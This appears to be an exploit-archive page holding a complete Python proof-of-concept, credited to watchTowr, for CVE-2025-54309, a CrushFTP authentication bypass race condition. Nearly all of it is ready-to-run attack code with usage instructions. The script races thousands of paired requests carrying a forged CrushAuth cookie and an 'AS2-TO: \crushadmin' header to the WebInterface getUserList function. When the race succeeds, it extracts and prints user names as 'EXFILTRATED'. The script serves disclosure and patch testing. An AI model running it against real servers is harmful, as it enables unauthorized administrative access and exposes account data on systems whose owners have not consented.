4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / watchTowr-vs-CrushFTP-CVE-2025-54309.py PY
#!/usr/bin/env python3
import requests
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
import sys
import random
import string

banner = """			 __         ___  ___________                   
	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
				  \\/          \\/     \\/                            
	  
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        """

helptext =  """
            Example Usage:
          - python watchTowr-vs-CrushFTP-CVE-2025-54309.py http://localhost:8082

			 """

# Generate random 4-character c2f value
def generate_random_c2f():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=4))

# Global variables for c2f and cookie management
C2F_VALUE = None
CRUSH_AUTH_COOKIE = None

def update_c2f_and_cookies():
    """Generate new c2f value and update cookies"""
    global C2F_VALUE, CRUSH_AUTH_COOKIE
    C2F_VALUE = generate_random_c2f()
    CRUSH_AUTH_COOKIE = f"CrushAuth=1755657772315_Nr7FSH4jd2l6RueteEaaEDpY1CcdU{C2F_VALUE}; currentAuth={C2F_VALUE}"
    print(f"[*] Generated new c2f value: {C2F_VALUE}")

# Initialize first c2f value
update_c2f_and_cookies()

def make_request_with_as2(target_url):
    """Make request with AS2-TO header and disposition-notification content type"""
    url = f"{target_url}/WebInterface/function/"
    
    headers = {
        "Host": target_url.replace("http://", "").replace("https://", ""),
        "User-Agent": "python-requests/2.32.3",
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Connection": "keep-alive",
        "AS2-TO": "\crushadmin",
        "Content-Type": "disposition-notification",
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": CRUSH_AUTH_COOKIE
    }
    
    data = {
        "command": "getUserList",
        "serverGroup":"MainUsers",
        "c2f": C2F_VALUE
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, verify=False, timeout=5)
        return f"AS2 Request - Status: {response.status_code}", response.text
    except Exception as e:
        return f"AS2 Request - Error: {str(e)}", ""

def make_request_without_as2(target_url):
    """Make request without AS2-TO header and disposition-notification content type"""
    url = f"{target_url}/WebInterface/function/"
    
    headers = {
        "Host": target_url.replace("http://", "").replace("https://", ""),
        "User-Agent": "python-requests/2.32.3",
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Connection": "keep-alive",
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": CRUSH_AUTH_COOKIE
    }
    
    data = {
        "command": "getUserList",
        "serverGroup":"MainUsers",
        "c2f": C2F_VALUE
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, verify=False, timeout=5)
        return f"Regular Request - Status: {response.status_code}", response.text
    except Exception as e:
        return f"Regular Request - Error: {str(e)}", ""

def check_vulnerable_response(response_text):
    """Check if response contains user_list_subitem pattern and extract usernames"""
    if "<user_list_subitem>" in response_text:
        # Extract all usernames from user_list_subitem tags
        import re
        usernames = re.findall(r'<user_list_subitem>(.*?)</user_list_subitem>', response_text)
        
        if usernames:
            # Limit to top 10 users
            top_users = usernames[:10]
            print(f"[*] EXFILTRATED {len(top_users)} USERS: {', '.join(top_users)}")
            return True
    
    return False

def race_requests_with_detection(target_url, num_requests=1000):
    """Race multiple requests and detect vulnerability"""
    print(f"Starting race with {num_requests} request pairs...")
    print("=" * 60)
    
    for i in range(num_requests):
        # Generate new c2f every 100 requests
        if i % 50 == 0:
            update_c2f_and_cookies()
            print(f"[*] NEW SESSION: c2f={C2F_VALUE}")
        
        # Store results
        results = {'as2': None, 'regular': None}
        
        def as2_worker():
            results['as2'] = make_request_with_as2(target_url)
        
        def regular_worker():
            results['regular'] = make_request_without_as2(target_url)
        
        # Create and start threads
        t1 = threading.Thread(target=as2_worker)
        t2 = threading.Thread(target=regular_worker)
        
        # Start both threads simultaneously
        t1.start()
        t2.start()
        
        # Wait for both to complete
        t1.join()
        t2.join()
        
        # Check for vulnerability in both responses
        as2_status, as2_response = results['as2']
        regular_status, regular_response = results['regular']
        
        # Check if either response contains the user list pattern
        if check_vulnerable_response(as2_response) or check_vulnerable_response(regular_response):
            print("[*] VULNERABLE! RACE CONDITION POSSIBLE!")
            return True
        
        # Print progress every 100 requests
        if (i + 1) % 50 == 0:
            print(f"[*] PROGRESS: {i + 1}/{num_requests} request pairs completed...")
    
    return False

def poc_attempt(target_url):
    """Main POC function with retry logic"""
    total_requests = 5000
    
    print("[*] CRUSHFTP RACE CONDITION POC")
    print(f"[*] TARGET: {target_url}")
    print("[*] ENDPOINT: CrushFTP WebInterface getUserList")
    print(f"[*] ATTACK: {total_requests} requests with new c2f every 50 requests")
    print("=" * 60)
    
    # Try 5000 requests with new c2f every 50
    if race_requests_with_detection(target_url, total_requests):
        return True
    
    print("[*] POC FAILED: Target appears to be patched or timing window missed")
    return False

if __name__ == "__main__":
    print(banner)
    
    if len(sys.argv) != 2:
        print(helptext)
        sys.exit(1)
    
    target_url = sys.argv[1]
    
    # Validate URL format
    if not target_url.startswith(('http://', 'https://')):
        print("[*] Error: URL must start with http:// or https://")
        sys.exit(1)
    
    poc_attempt(target_url)